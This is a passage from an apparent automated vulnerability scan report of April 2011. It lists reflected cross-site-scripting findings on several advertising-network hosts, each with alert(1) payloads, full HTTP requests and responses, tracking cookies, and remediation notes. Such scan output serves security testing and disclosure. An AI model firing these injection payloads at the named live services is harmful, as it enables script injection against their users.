Cookie: uuid2=8663496762294337265; anj=Kfu=8fG4S]fQCe7?0P(*AuB-u**g1:XIF3ZUMbNTk^i4(0yHan$WRZ?dsg4U!.GQv!b=rS4vsHr#5hLUHfpwcPki/)#5j#QOVB/1X?`d/Lh<E'Cm2t/WTA]'`kG3]ocdCcrW'<%^Ue4vP!!5ch.vajEL)BV[>#vXU'Dqt8H!mBfnMp/NHg8A3Ndz!g8cZwEc(wVe4[.3A2tr=lb)p#*Xc02Og?@'f9fL9.O3]'UWJ-No-vqc^97BbwdN:A>`PTQ'knJh9yhU$

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 12-Apr-2011 16:21:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 16:21:51 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 11 Apr 2011 16:21:51 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/matche0bd2'-alert(1)-'82d72219828?admeld_adprovider_id=193&external_user_id=8663496762294337265&expiration=0" width="0" height="0"/>');

1.26. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db13b'%3balert(1)//7d749869842 was submitted in the admeld_adprovider_id parameter. This input was echoed as db13b';alert(1)//7d749869842 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /clicksense/admeld/match?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=73db13b'%3balert(1)//7d749869842&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain
Date: Mon, 11 Apr 2011 16:31:37 GMT
Expires: Mon, 11 Apr 2011 16:31:38 GMT
P3P: CP=NOI ADM DEV CUR
Server: Apache-Coyote/1.1
Set-Cookie: 2=2x5NrHbDfMO; Domain=.lucidmedia.com; Expires=Tue, 10-Apr-2012 16:31:38 GMT; Path=/
Content-Length: 192
Connection: keep-alive

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/match?admeld_adprovider_id=73db13b';alert(1)//7d749869842&external_user_id=3406242444969162266"/>');

1.27. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2bef0'%3balert(1)//20f199ae318 was submitted in the admeld_callback parameter. This input was echoed as 2bef0';alert(1)//20f199ae318 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /clicksense/admeld/match?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match2bef0'%3balert(1)//20f199ae318 HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain
Date: Mon, 11 Apr 2011 16:31:39 GMT
Expires: Mon, 11 Apr 2011 16:31:40 GMT
P3P: CP=NOI ADM DEV CUR
Server: Apache-Coyote/1.1
Set-Cookie: 2=2x5NrivaYDr; Domain=.lucidmedia.com; Expires=Tue, 10-Apr-2012 16:31:40 GMT; Path=/
Content-Length: 192
Connection: keep-alive

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/match2bef0';alert(1)//20f199ae318?admeld_adprovider_id=73&external_user_id=3406242474301735927"/>');

1.28. http://ads.adap.tv/beacons [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adap.tv
Path:   /beacons

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload ab9b5<script>alert(1)</script>384174b4e4a was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacons?callback=jsonp1302352256751ab9b5<script>alert(1)</script>384174b4e4a HTTP/1.1
Host: ads.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="-1808697827335733967__TIME__2011-04-09+05%3A31%3A05";Path=/;Domain=.adap.tv;Expires=Tue, 16-Dec-42 14:17:45 GMT
Content-Type: text/plain; charset=iso-8859-1
Server: Jetty(6.1.22)
Content-Length: 620

jsonp1302352256751ab9b5<script>alert(1)</script>384174b4e4a({
   "beacons":["http://tags.bluekai.com/site/2174", "http://load.exelator.com/load/?p=104&g=080&j=0&u=1234567&site=2222", "http://pixel.quantserve.com/seg/r;a=p-573scDfDoUH6o;redirect=http://segments.a
...[SNIP]...

1.29. http://ads.adbrite.com/adserver/vdi/682865 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/682865

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 257af<script>alert(1)</script>adaed44508d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/682865257af<script>alert(1)</script>adaed44508d?d=null&r=http%3A%2F%2Fuser.lucidmedia.com%2Fclicksense%2Fuser%3Fp%3D88436487f575811a%26r%3D0%26i%3D HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@1@4da0529f@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj"

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Sat, 09 Apr 2011 12:36:44 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/682865257af<script>alert(1)</script>adaed44508d

1.30. http://ads.adbrite.com/adserver/vdi/682865 [r parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/682865

Issue detail

The value of the r request parameter is copied into the HTML document as plain text between tags. The payload 41e2c<script>alert(1)</script>c765e6e8b07 was submitted in the r parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /adserver/vdi/682865?d=null&r=41e2c<script>alert(1)</script>c765e6e8b07 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@1@4da0529f@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj"

Response (redirected)

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Sat, 09 Apr 2011 12:36:42 GMT
Server: XPEHb/1.0
Content-Length: 123

Unsupported URL: /adserver/vdi/41e2c<script>alert(1)</script>c765e6e8b07MTY4MzYyMDQ2eDAuNzQzIDEzMDE3ODY2MDV4LTExODAzODE1MDI

1.31. http://ads.adbrite.com/adserver/vdi/684339 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/684339

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cd6ca<script>alert(1)</script>eb33f605576 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/684339cd6ca<script>alert(1)</script>eb33f605576?d=uuid%3D4d97b063-cd55-fcc9-f79b-3dc3c331fd5b HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@1@4da0529f@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj"

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Sat, 09 Apr 2011 12:36:41 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/684339cd6ca<script>alert(1)</script>eb33f605576

1.32. http://ads.adbrite.com/adserver/vdi/712156 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/712156

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 519ae<script>alert(1)</script>90d04b9f705 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/712156519ae<script>alert(1)</script>90d04b9f705?d=1iolb30nur9ak HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh38.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMJKukoJSXm5aUWZYL1KdXWAgA%3D"; vsd=0@1@4d9d6e04@cti.w55c.net; rb=0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Sat, 09 Apr 2011 00:22:33 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/712156519ae<script>alert(1)</script>90d04b9f705

1.33. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 43f7e<script>alert(1)</script>2c8a8d39513 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/74269743f7e<script>alert(1)</script>2c8a8d39513?d=4608069584519221037 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069584519221037&mktid=&mpid=&fpid=-1&rnd=7441790688687410964&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; fq="7xiqt%2C1uo0%7Cljdxnj%7Cljdxnp%2C86fx4%2C1uo0%7Cljdxno"; rb=0:682865:20838240:null:0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:762701:20861280:E3F32BD012B0974D052B68A20247663B:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 11 Apr 2011 16:41:56 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/74269743f7e<script>alert(1)</script>2c8a8d39513

1.34. http://ads.adbrite.com/adserver/vdi/762701 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/762701

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ac400<script>alert(1)</script>54595068153 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/762701ac400<script>alert(1)</script>54595068153?d=E3F32BD012B0974D052B68A20247663B HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@1@4da0529f@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj"

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Sat, 09 Apr 2011 12:36:30 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/762701ac400<script>alert(1)</script>54595068153

1.35. http://ads.adbrite.com/adserver/vdi/779045 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/779045

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 54e24<script>alert(1)</script>80b200b4843 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/77904554e24<script>alert(1)</script>80b200b4843?d=37820808542507095 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@1@4da0529f@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj"

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Sat, 09 Apr 2011 12:36:39 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/77904554e24<script>alert(1)</script>80b200b4843

1.36. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 71675<script>alert(1)</script>d3c41350c71 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1486891&pid=42375771675<script>alert(1)</script>d3c41350c71&ps=-1&zw=405&zh=220&url=http%3A//www.foxnews.com/politics/index.html&v=5&dct=Politics%20-%20FoxNews.com&ref=http%3A//www.foxnews.com/&metakw=politics,presidential%20politics,political%20news,political%20parties,American%20politics HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 16:21:53 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2950


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "42375771675<script>alert(1)</script>d3c41350c71"

   
                                                           </head>
...[SNIP]...

1.37. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload 306f0--><script>alert(1)</script>135101e601a was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1486891306f0--><script>alert(1)</script>135101e601a&pid=423757&ps=-1&zw=405&zh=220&url=http%3A//www.foxnews.com/politics/index.html&v=5&dct=Politics%20-%20FoxNews.com&ref=http%3A//www.foxnews.com/&metakw=politics,presidential%20politics,political%20news,political%20parties,American%20politics HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 16:21:51 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3315


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "1486891306f0--><script>alert(1)</script>135101e601a" -->
...[SNIP]...

1.38. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload 4ce19--><script>alert(1)</script>f8c3628d761 was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1486891&pid=423757&ps=-14ce19--><script>alert(1)</script>f8c3628d761&zw=405&zh=220&url=http%3A//www.foxnews.com/politics/index.html&v=5&dct=Politics%20-%20FoxNews.com&ref=http%3A//www.foxnews.com/&metakw=politics,presidential%20politics,political%20news,political%20parties,American%20politics HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 16:21:56 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3754


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-14ce19--><script>alert(1)</script>f8c3628d761" -->
   
...[SNIP]...

1.39. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3fbf"-alert(1)-"b5702b8b71e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=300x250&section=1209091&e3fbf"-alert(1)-"b5702b8b71e=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
